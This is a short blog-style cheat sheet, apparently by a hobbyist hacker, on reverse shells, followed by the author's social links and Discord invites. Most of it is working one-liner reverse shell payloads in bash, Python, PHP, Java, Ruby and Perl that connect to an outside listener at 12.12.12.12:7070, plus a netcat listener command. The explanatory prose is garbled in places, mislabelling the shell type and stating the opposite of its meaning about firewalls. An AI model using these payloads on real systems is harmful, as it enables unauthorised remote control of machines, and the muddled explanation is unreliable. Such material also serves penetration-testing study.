Reverse Shells

How do reverse shells work?

To make a connection to a typical remote shell, a machine controlled by the attacker connects to the remote network host and it requests a shell connection.
This is called a blind shell

But what if the remote host is not directly accessible, like it has public IP or is protected by a firewall?

In this situation reverse shells maybe shouldn't be used, where the target machine initiates connection to the listening network host a shell is now established.

Reverse Shells Examples

To start you need a listener process on their system to listen the reverse shell connections incoming to their IP address, Eg, 12.12.12.12
On Linux, this can be as simple as one netcat command.

nc -lvnp 7070

The netcat listener will listen at port 7070. An attacker needs to execute the code to the listener. Many reverse shells needs programming langs
and systems.
Check out pentestmonkey’s Reverse Shell Cheat Sheet for more.
Codes are typically one-liners to allow injection using a single command.
While the examples below are for Linux and other Unix-like systems, many of them will also work on Windows if you change the command line interpreter call from /bin/sh -i to cmd.exe.

Bash Reverse Shell

If the target machine runs Linux, it’s a good idea to start with bash, as nearly all Linux systems come with this system shell:

/bin/bash -i >& /dev/tcp/12.12.12.12/7070 0>&1

Python Reverse Shell

With Python continuing to gain popularity, there’s a good chance it’s available on the target server and can be used to execute a script like:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("12.12.12.12",7070));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP Reverse Shell

Most web servers will have PHP installed, and this too can provide a reverse shell vector (if the file descriptor &3 doesn’t work, you can try subsequent numbers):

php -r '$sock=fsockopen("12.12.12.12",7070);exec("/bin/sh -i <&3 >&3 2>&3");'

Java Reverse Shell

Java is likely to be available on application servers:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/12.12.12.12/7070;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ruby Reverse Shell

Ruby is another popular web application language that’s likely to have an interpreter on a general-purpose server system:

ruby -rsocket -e'f=TCPSocket.open("12.12.12.12",7070).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Perl Reverse Shell

As with bash, a perl interpreter should be available on most Linux servers, so a perl command might be another way to obtain a reverse shell:

perl -e 'use Socket;$i="12.12.12.12";$p=7070;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Check out my Gist Here

Credits

Follow me!

• Github: https://github.com/Yuma-Tsushima07
• Medium: https://0xv37r1x3r.medium.com/
• SoundCloud: https://soundcloud.com/0c7av3h4ck5

Discord Servers!!

Bounty Hunters: An amazing bug hunting community full of developers and exploiters!!!

• Link: https://discord.gg/J5PsgKqdWq

CyberArtByte: My server full of bling and joy!!

• Link: https://discord.com/invite/mNAWykv67W

New Soundcloud Track!!

Author: Yuma-Tsushima07